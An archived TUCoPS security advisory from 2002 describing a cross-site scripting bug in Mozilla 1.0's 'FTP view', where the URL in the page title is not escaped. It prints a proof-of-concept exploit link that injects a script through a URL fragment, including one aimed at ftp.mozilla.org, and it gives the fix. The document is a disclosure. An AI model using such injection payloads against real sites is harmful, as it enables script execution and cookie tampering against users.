TUCoPS :: Browsers :: nscp5605.htm

Mozilla allows running Malicious Scripts due to a bug in 'FTP view'
6th Aug 2002 [SBWID-5605]
COMMAND

	Mozilla allows running Malicious Scripts due to a bug in 'FTP view'

SYSTEMS AFFECTED

	Mozilla 1.0

PROBLEM

	Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp] says :
	

	Mozilla allows running Malicious Scripts due to a bug in 'FTP view'.  If
	you click on a malicious link, the script embedded in URL will run.
	

	* If the ftp server and the http server are  the  same  address,  it  is
	dangerous.
	  Because the cookie may be modified by the attacker.

	

	 

	 + Detailes:

	 ~~~~~~~~~~~

	

	This problem is in 'FTP view'.  The  '<title>URL</title>'  is  not
	escaped.
	

	 

	 + Exploit code:

	 ~~~~~~~~~~~~~~~~~

	

	<a href="ftp://[FTPserver]/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

	

	Example:
	

	<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

	

	 + Demonstration:

	 ~~~~~~~~~~~~~~~~

	

	http://www.geocities.co.jp/SiliconValley/1667/advisory03e.html

	

	

SOLUTION

	Get Mozilla 1.1 Beta or disable javascript

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH